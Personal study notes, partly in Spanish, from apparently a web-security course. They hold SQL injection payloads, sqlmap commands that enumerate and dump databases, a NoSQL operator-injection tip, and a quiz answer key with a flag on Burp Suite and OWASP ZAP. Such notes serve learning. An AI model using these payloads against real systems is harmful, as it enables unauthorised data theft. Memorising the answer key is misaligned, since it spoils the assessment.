Notas:

https://github.com/payloadbox/sql-injection-payload-list
Basic SQL commands:
SHOW DATABASES;
SELECT db1;
SHOW TABLES;
SELECT * FROM tabla1 WHERE id LIKE 'ID%';
sentencia1 UNION sentencia2;
INSERT into db1.tabla1 VALUES (campo1,campo2,campo3,...);
UPDATE db1.tabla1 set campo1="nuevo_valor" WHERE id="ID";
SELECT * FROM tabla1 WHERE id="ID%" OR SLEEP(5);
sentencia1 OR SLEEP(X) UNION sentencia2;
1 amd 1234=1234
SQLi:
Error base: ' OR 1=1 #
Time based: ' or sleep(5)#
Union Select: UNION ALL SELECT null,...#
boolean-base blind: 1 amd 1=1#
SQLMap:
sqlmap

-r REQUESTFILE
-p PARAM1,PARAM2,....PARAMN
--threads=THREADS (default1)
-o Turn on all optimization switches
--random-agent Use randomly selected HTTP User-Agent header value
--dbms=DBMS DBTechnology ()MySql, MsSQL...)
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--os=OS OS
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate

Example:
sqlmap -r request -p param1,param2,param3 --random-agent --level=3 --
risk=2 --dbs
sqlmap -r request -p param1,param2,param3 --random-agent --level=3 --
risk=2 --dbms=DBType -D database1 --tables
sqlmap -r request -p param1,param2,param3 --random-agent --level=3 --
risk=2 --dbms=DBType -D database1 -T table1 --dump
SQLite:
sqlite_version()
tbl_name
sql
sqlite_master
NoSQL:
mongo
show dbs;
use database1;
 show colections; --> (son las tablas)
db.colection1.find() --> muestra la información de la tabla colection1
db.city.find({$and:[{"state":"IN"},{"pop":{$lt:100}}]}).count()
db.city.find({"city":{$regex:"^HA.*"}}).count()
operadores lógicos: lt, gt, eq, nq, ...
Para hacer inyecciones recuerda que si hay X=algo -->
X[$operador_logico]=algo

1.-Which one of the following Intruder Attack types supports the use of multiple
payload sets?
Pitchfork
2.-The Sniper Attack utilizes more than one set of payloads.
False
3.-The Burp Suite Intruder can be used to perform a file and directory brute force
attack.
True
4.-The Decoder module in Burp Suite allows you to decode Base32 strings
True
5.-When working with the Intruder, can you configure a Payload processing rule to
encode the payload in Base64?
True
Flag: d25db4ce54b60b49dfd7b32c52ed8d26
6.-Can you utilize the Repeater to view and modify the headers of a request before
sending the request?
True
7.-When modifying a request in the Repeater, what Keyboard shortcut can be used to
enable URL encoding as you type?
Crtl+U
8.-Can you modify the number of threads used when running the Forced Browse module
in OWASP ZAP?
True
9.-How many authentication methods are supported when configuring a Context in
OWASP ZAP?
5
10.-Can you use the Spider in OWASP ZAP to automatically process forms?
True